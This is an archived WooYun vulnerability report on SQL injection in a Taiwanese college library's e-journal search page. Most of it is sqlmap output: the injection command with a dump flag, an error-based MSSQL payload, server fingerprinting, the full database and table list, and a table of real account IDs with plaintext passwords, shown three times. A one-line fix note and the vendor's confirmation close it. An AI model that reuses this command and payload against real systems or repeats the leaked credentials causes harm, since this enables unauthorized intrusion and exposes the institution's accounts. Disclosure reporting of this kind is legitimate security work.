乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-02: 厂商已经确认,细节仅向厂商公开 2015-12-12: 细节向核心白帽子及相关领域专家公开 2015-12-22: 细节向普通白帽子公开 2016-01-01: 细节向实习白帽子公开 2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开
一、願景以培育立型人才為理念,提供專業的圖書館服務,營造學院整合、協同成長之學習環境。 二、目標1. 空間─營造優質空間2. 館藏─建構完整資源3. 專業─精進專業知能4. 管理─提升管理成效5. 數位─強化數位內容6. 服務─提供精緻服務
地址:http://**.**.**.**/database/search/ejournal/JournalList_user.asp
$ python sqlmap.py -u "http://**.**.**.**/database/search/ejournal/JournalList_user.asp" -p Language --technique=BE --form --random-agent --batch -D EDB -T Main -C ID,Password --dump
Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 98318 || sys.sysmessages | 98318 |
Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 13660 |
Database: EDBTable: Main[9 entries]+-------------+-----------------+| ID | Password |+-------------+-----------------+| 100325531 | camiojc || 103udndata | 103udndata || college93 | college93 || guest | guest || ntit | ntitlib || reviewer | 4filibusters356 || taiwantrial | 2010trial || user0011 | user0011 || 自訂 | 自訂 |+-------------+-----------------+
---Parameter: Language (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008current user: 'edbsa1'current user is DBA: Falsedatabase management system users [2]:[*] edbsa1[*] sadatabase management system users password hashes:[*] edbsa1 [1]: password hash: NULL[*] sa [1]: password hash: NULLDatabase: EDB+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.ClassifiedByCollege | 1248 || dbo.ClassifiedBySubject | 1009 || dbo.ClassifiedByDataType | 537 || dbo.Main | 472 || dbo.Main_20150128 | 434 || dbo.ClassifiedByCollege_20120209 | 332 || dbo.TrialSurveyDept | 41 || dbo.DataType | 22 || dbo.IDAskFor | 17 || dbo.Subject | 7 || dbo.College | 6 || dbo.DatabaseType | 6 || dbo.FunctionName | 6 || dbo.JournalCoverage | 6 || dbo.Status | 6 || dbo.College_20120209 | 5 || dbo.Survey | 5 || dbo.AccessArea | 4 || dbo.Platform | 3 || dbo.Proxy | 3 |+--------------------------------------------------+---------+Database: EJournal+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.Main | 73130 || dbo.Main_9 | 70765 || dbo.Main_20140121 | 63236 || dbo.Main_20150420 | 59129 || dbo.main_20120928 | 56744 || dbo.main_20110629 | 34278 || dbo.sheet1$ | 30699 || dbo.電子期刊上傳_BSC2015 | 20395 || dbo.電子期刊上傳_華藝 | 13179 || dbo.電子期刊上傳_CJTD2015 | 8545 || dbo.電子期刊上傳_萬方期刊清單7774刊 | 7774 || dbo.電子期刊上傳_ASP2015 | 6126 || dbo.電子期刊上傳_CEPS2015 | 4634 || dbo.電子期刊上傳_Ecolit2015 | 3042 || dbo.電子期刊上傳_OmniFile2015 | 2862 || dbo.電子期刊上傳_SDOL2015 | 2221 || dbo.電子期刊清單_SDOL | 2221 || dbo.電子期刊上傳_ASTS2015 | 1598 || dbo.電子期刊上傳_Medline2015 | 1458 || dbo.西文電子期刊上傳_ABIR | 1343 || dbo.電子期刊上傳_ABIR2015 | 1343 || dbo.ACM | 1140 || dbo.電子期刊上傳_ACM | 1140 || dbo.電子期刊上傳_Hyread2015 | 1136 || dbo.西文電子期刊上傳_EJ | 1119 || dbo.電子期刊上傳_EJ2015 | 1119 || dbo.西文電子期刊清單VSP | 1011 || dbo.CJFD期刊清單 | 846 || dbo.[電子期刊上傳_PQ-Nursing2015] | 793 || dbo.ProQuest | 793 || dbo.電子期刊上傳_CINAHL2015 | 760 || dbo.電子期刊上傳_PDC2015 | 709 || dbo.電子期刊上傳_CMMC2015 | 642 || dbo.電子期刊上傳_JSTOR2015 | 600 || dbo.電子期刊上傳_PAO | 547 || dbo.電子期刊上傳_Library2015 | 368 || dbo.電子期刊上傳_SOJA | 259 || dbo.電子期刊上傳_MagV2015 | 170 || dbo.電子期刊上傳_摩達網 | 170 || dbo.[電子期刊上傳-華藝雜誌124種] | 124 || dbo.電子期刊上傳_WSPC2015 | 116 || dbo.[0522_EM60-2015] | 80 || dbo.電子期刊上傳_OJDA | 71 || dbo.DB | 63 || dbo.電子期刊上傳_華藝雜誌 | 37 || dbo.[IEEE CSDL] | 35 || dbo.[電子期刊上傳_IEEE CSDL] | 35 || dbo.電子期刊上傳_Acer2015 | 27 || dbo.[電子期刊上傳_2016中文電子期刊清單-Hyread-app] | 18 || dbo.電子期刊上傳_GreenFILE2015 | 14 || dbo.Source | 12 || dbo.電子期刊上傳_華藝精選電子雜誌 | 10 || dbo.西文電子期刊上傳_vogue | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 98318 || sys.sysmessages | 98318 || sys.fulltext_system_stopwords | 15829 || sys.syscolumns | 11966 || sys.all_parameters | 7090 || sys.system_parameters | 7090 || sys.trace_subclass_values | 5366 || sys.all_columns | 4670 || sys.system_columns | 4626 || sys.trace_event_bindings | 4304 || sys.syscomments | 2994 || dbo.spt_values | 2508 || sys.all_objects | 1934 || sys.sysobjects | 1934 || sys.system_objects | 1928 || sys.database_permissions | 1844 || sys.syspermissions | 1844 || sys.sysprotects | 1843 || sys.all_sql_modules | 1783 || sys.system_sql_modules | 1783 || sys.dm_audit_actions | 454 || sys.spatial_reference_systems | 390 || sys.event_notification_event_types | 365 || sys.all_views | 354 || sys.system_views | 354 || sys.trigger_event_types | 245 || sys.trace_events | 180 || sys.allocation_units | 128 || sys.partitions | 116 || sys.syscharsets | 114 || sys.xml_schema_facets | 112 || sys.xml_schema_components | 99 || sys.system_components_surface_area_configuration | 95 || sys.dm_audit_class_type_map | 83 || sys.xml_schema_types | 82 || sys.configurations | 68 || sys.sysconfigures | 68 || sys.syscurconfigs | 68 || sys.trace_columns | 66 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.systypes | 34 || sys.types | 34 || sys.syslanguages | 33 || sys.securable_classes | 22 || sys.trace_categories | 21 || sys.xml_schema_component_placements | 18 || sys.xml_schema_attributes | 15 || sys.database_principals | 14 || sys.sysusers | 14 || INFORMATION_SCHEMA.SCHEMATA | 13 || sys.database_mirroring | 13 || sys.database_recovery_status | 13 || sys.databases | 13 || sys.schemas | 13 || sys.sysdatabases | 13 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.assembly_types | 3 || sys.service_queue_usages | 3 || sys.stats | 3 || sys.type_assembly_usages | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.assemblies | 1 || sys.assembly_files | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 13660 || dbo.backupmediafamily | 6830 || dbo.backupmediaset | 6830 || dbo.backupset | 6830 || dbo.syspolicy_configuration | 4 || dbo.restorefile | 2 || dbo.restorefilegroup | 1 || dbo.restorehistory | 1 |+--------------------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: EDBTable: Main[1 column]+----------+---------+| Column | Type |+----------+---------+| Password | varchar |+----------+---------+Database: EDBTable: Main_20150128[1 column]+----------+---------+| Column | Type |+----------+---------+| Password | varchar |+----------+---------+Database: masterTable: sysoledbusers[1 column]+-------------+----------+| Column | Type |+-------------+----------+| rmtpassword | nvarchar |+-------------+----------+Database: masterTable: syslogins[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: masterTable: sysusers[1 column]+----------+-----------+| Column | Type |+----------+-----------+| password | varbinary |+----------+-----------+Database: masterTable: sql_logins[1 column]+---------------+-----------+| Column | Type |+---------------+-----------+| password_hash | varbinary |+---------------+-----------+Database: msdbTable: backupset[1 column]+-----------------------+------+| Column | Type |+-----------------------+------+| is_password_protected | bit |+-----------------------+------+Database: msdbTable: backupmediaset[1 column]+-----------------------+------+| Column | Type |+-----------------------+------+| is_password_protected | bit |+-----------------------+------+Database: EDBTable: Main[9 entries]+-----------------+| Password |+-----------------+| 103udndata || 2010trial || 4filibusters356 || camiojc || college93 || guest || ntitlib || user0011 || 自訂 |+-----------------+Database: EDBTable: Main_20150128[9 entries]+-----------------+| Password |+-----------------+| 103udndata || 2010trial || 4filibusters356 || camiojc || college93 || guest || ntitlib || user0011 || 自訂 |+-----------------+Database: msdbTable: backupset[1 entry]+-----------------------+| is_password_protected |+-----------------------+| 0 |+-----------------------+Database: msdbTable: backupmediaset[1 entry]+-----------------------+| is_password_protected |+-----------------------+| 0 |+-----------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: Language (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008Database: EDBTable: Main[40 columns]+-----------------------+----------+| Column | Type |+-----------------------+----------+| AccessAreaNum | int || AccessMode | varchar || AllocatedDisk | varchar || Annotate | nvarchar || Back_up | char || BackupYear | varchar || ConcurrentUser | nvarchar || DatabaseType | varchar || DataCoverage | nvarchar || Deadline | datetime || Domain | varchar || EarlyCDROM | char || EarlyCDROMYear | varchar || ErrorConnection | int || FulltextViewer | varchar || Guide | nvarchar || ID | varchar || IDAskForNum | int || InvalidAccessdatetime | datetime || Item | int || Language | nvarchar || Movie | nvarchar || Note | nvarchar || OperationSystem | varchar || Password | varchar || PlatformNum | int || Producer | nvarchar || ProxyNum | int || SharedFolder | varchar || Sort | char || Source | varchar || StatusNum | int || SubjectCoverage | nvarchar || SurveyNum | int || SurveyURL | varchar || TimeCoverage | nvarchar || Title | nvarchar || Updatedate | datetime || UpdateFrequency | varchar || Vendor | varchar |+-----------------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: Language (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008Database: EDBTable: Main[9 entries]+-------------+-----------------+| ID | Password |+-------------+-----------------+| 100325531 | camiojc || 103udndata | 103udndata || college93 | college93 || guest | guest || ntit | ntitlib || reviewer | 4filibusters356 || taiwantrial | 2010trial || user0011 | user0011 || 自訂 | 自訂 |+-------------+-----------------+
上WAF。
危害等级:高
漏洞Rank:15
确认时间:2015-12-02 15:56
感謝通報
2016-01-05:確認修復